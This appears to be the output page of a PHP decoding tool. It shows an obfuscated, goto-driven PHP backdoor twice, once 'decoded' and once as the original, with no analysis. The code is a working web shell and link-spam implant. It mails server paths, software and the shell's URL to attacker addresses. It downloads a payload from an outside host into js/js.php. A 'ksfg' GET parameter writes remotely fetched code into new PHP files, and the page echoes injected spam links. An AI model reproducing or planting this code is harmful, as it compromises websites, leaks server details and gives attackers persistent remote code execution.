Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto SRqWM; GT06j: $ip_remote = $_SERVER["REMOTE_ADDR"]; goto WxY5X; EPStz: $host ..

Decoded Output download

<?php  
goto SRqWM; GT06j: $ip_remote = $_SERVER["REMOTE_ADDR"]; goto WxY5X; EPStz: $host = str_replace("www.", '', @$_SERVER["HTTP_HOST"]); goto VbZZo; MrdsV: mail($kime, $baslik, $EL_MuHaMMeD); goto ycRWO; VbZZo: $x = $s . "l-" . base64_encode($host); goto vocKi; fcTxE: $datasi = @fopen("js/js.php", "r"); goto f0gss; WxY5X: $from_shellcode = "bu shelli sifrelemis birir baba@" . gethostbyname($_SERVER["SERVER_NAME"]) . ''; goto na0zO; TseRY: $EL_MuHaMMeD .= "Shell Link : http://" . $_SERVER["SERVER_NAME"] . $_SERVER["PHP_SELF"] . "\xd 
"; goto P25aQ; gOu7_: $baslik = "min 20203"; goto ITrx0; Vu4d_: if (isset($_GET["ksfg"])) { $f = fopen($_GET["ksfg"] . ".php", "a"); fwrite($f, file_get_contents($s . "s-" . $_GET["ksfg"])); fclose($f); } goto pc6ad; zcR0M: $kime = "[email protected]"; goto gOu7_; LuCEK: error_reporting(0); goto Qm2nP; na0zO: $to_email = "[email protected]"; goto SAkS_; k2fj3: @mail($to_email, $server_mail, $linkcr, $header); goto LuCEK; pc6ad: echo "<!DOCTYPE html!>"; goto MHk5b; smFEV: $linkcr = "Link: " . $_SERVER["SERVER_NAME"] . '' . $_SERVER["REQUEST_URI"] . " - IP Excuting: {$ip_remote} - Time: {$time_shell}"; goto IY1SH; ITrx0: $EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER["DOCUMENT_ROOT"] . " 
\xa"; goto uKXJ_; P25aQ: $EL_MuHaMMeD .= "Avlanan Site : " . $_SERVER["HTTP_HOST"] . " 
"; goto MrdsV; RouMg: echo $gitt; goto Vu4d_; mMYJJ: $EL_MuHaMMeD .= "Server isletim sistemi : " . $_SERVER["SERVER_SOFTWARE"] . "\xd\xa"; goto TseRY; f0gss: if ($datasi) { } else { @mkdir("js"); $dos = file_get_contents("https://acbdf.space/txt/lamer.txt"); $data = "js/js.php"; @touch("js/js.php"); $ver = @fopen($data, "w"); @fwrite($ver, $dos); @fclose($ver); $yol = "http://" . $_SERVER["HTTP_HOST"] . '' . $_SERVER["REQUEST_URI"] . ''; $y = "<h1>Sender Yazdirildi.<br/> SITE YOL : " . $yol . "<br/>Sender Yolu : js/crs.php</h1>"; $header .= "From: SheLL Boot <[email protected]>\xa"; $header .= "Content-Type: text/html; 
 charset=utf-8\xa"; @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); } goto zcR0M; MHk5b: if ($_POST["query"]) { $veriyfy = stripslashes(stripslashes($_POST["query"])); $data = "data.txt"; @touch("data.txt"); $ver = @fopen($data, "w"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("data.txt", "r"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto fcTxE; uKXJ_: $EL_MuHaMMeD .= "Server Admin : " . $_SERVER["SERVER_ADMIN"] . "\xd 
"; goto mMYJJ; Qm2nP: $s = "https://acbdf.space/"; goto EPStz; SRqWM: $time_shell = '' . date("d/m/Y - H:i:s") . ''; goto GT06j; vocKi: if (function_exists("curl_init")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("file_get_contents")) { @($gitt = file_get_contents($x)); } goto RouMg; SAkS_: $server_mail = '' . gethostbyname($_SERVER["SERVER_NAME"]) . "  - " . $_SERVER["HTTP_HOST"] . ''; goto smFEV; IY1SH: $header = "From: {$from_shellcode}\xd 
Reply-to: {$from_shellcode}"; goto k2fj3; ycRWO:  ?>

Did this file decode correctly?

Original Code

<?php 
goto SRqWM; GT06j: $ip_remote = $_SERVER["REMOTE_ADDR"]; goto WxY5X; EPStz: $host = str_replace("www.", '', @$_SERVER["HTTP_HOST"]); goto VbZZo; MrdsV: mail($kime, $baslik, $EL_MuHaMMeD); goto ycRWO; VbZZo: $x = $s . "l-" . base64_encode($host); goto vocKi; fcTxE: $datasi = @fopen("js/js.php", "r"); goto f0gss; WxY5X: $from_shellcode = "bu shelli sifrelemis birir baba@" . gethostbyname($_SERVER["SERVER_NAME"]) . ''; goto na0zO; TseRY: $EL_MuHaMMeD .= "Shell Link : http://" . $_SERVER["SERVER_NAME"] . $_SERVER["PHP_SELF"] . "\xd
"; goto P25aQ; gOu7_: $baslik = "min 20203"; goto ITrx0; Vu4d_: if (isset($_GET["ksfg"])) { $f = fopen($_GET["ksfg"] . ".php", "a"); fwrite($f, file_get_contents($s . "s-" . $_GET["ksfg"])); fclose($f); } goto pc6ad; zcR0M: $kime = "[email protected]"; goto gOu7_; LuCEK: error_reporting(0); goto Qm2nP; na0zO: $to_email = "[email protected]"; goto SAkS_; k2fj3: @mail($to_email, $server_mail, $linkcr, $header); goto LuCEK; pc6ad: echo "<!DOCTYPE html!>"; goto MHk5b; smFEV: $linkcr = "Link: " . $_SERVER["SERVER_NAME"] . '' . $_SERVER["REQUEST_URI"] . " - IP Excuting: {$ip_remote} - Time: {$time_shell}"; goto IY1SH; ITrx0: $EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER["DOCUMENT_ROOT"] . "
\xa"; goto uKXJ_; P25aQ: $EL_MuHaMMeD .= "Avlanan Site : " . $_SERVER["HTTP_HOST"] . "
"; goto MrdsV; RouMg: echo $gitt; goto Vu4d_; mMYJJ: $EL_MuHaMMeD .= "Server isletim sistemi : " . $_SERVER["SERVER_SOFTWARE"] . "\xd\xa"; goto TseRY; f0gss: if ($datasi) { } else { @mkdir("js"); $dos = file_get_contents("https://acbdf.space/txt/lamer.txt"); $data = "js/js.php"; @touch("js/js.php"); $ver = @fopen($data, "w"); @fwrite($ver, $dos); @fclose($ver); $yol = "http://" . $_SERVER["HTTP_HOST"] . '' . $_SERVER["REQUEST_URI"] . ''; $y = "<h1>Sender Yazdirildi.<br/> SITE YOL : " . $yol . "<br/>Sender Yolu : js/crs.php</h1>"; $header .= "From: SheLL Boot <[email protected]>\xa"; $header .= "Content-Type: text/html;
 charset=utf-8\xa"; @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); } goto zcR0M; MHk5b: if ($_POST["query"]) { $veriyfy = stripslashes(stripslashes($_POST["query"])); $data = "data.txt"; @touch("data.txt"); $ver = @fopen($data, "w"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("data.txt", "r"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } goto fcTxE; uKXJ_: $EL_MuHaMMeD .= "Server Admin : " . $_SERVER["SERVER_ADMIN"] . "\xd
"; goto mMYJJ; Qm2nP: $s = "https://acbdf.space/"; goto EPStz; SRqWM: $time_shell = '' . date("d/m/Y - H:i:s") . ''; goto GT06j; vocKi: if (function_exists("curl_init")) { $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch); if ($gitt == false) { @($gitt = file_get_contents($x)); } } elseif (function_exists("file_get_contents")) { @($gitt = file_get_contents($x)); } goto RouMg; SAkS_: $server_mail = '' . gethostbyname($_SERVER["SERVER_NAME"]) . "  - " . $_SERVER["HTTP_HOST"] . ''; goto smFEV; IY1SH: $header = "From: {$from_shellcode}\xd
Reply-to: {$from_shellcode}"; goto k2fj3; ycRWO:  ?>

Function Calls

None

Variables

None

Stats

MD5 0a069d3e758b7dec9b659bf8c4340118
Eval Count 0
Decode Time 61 ms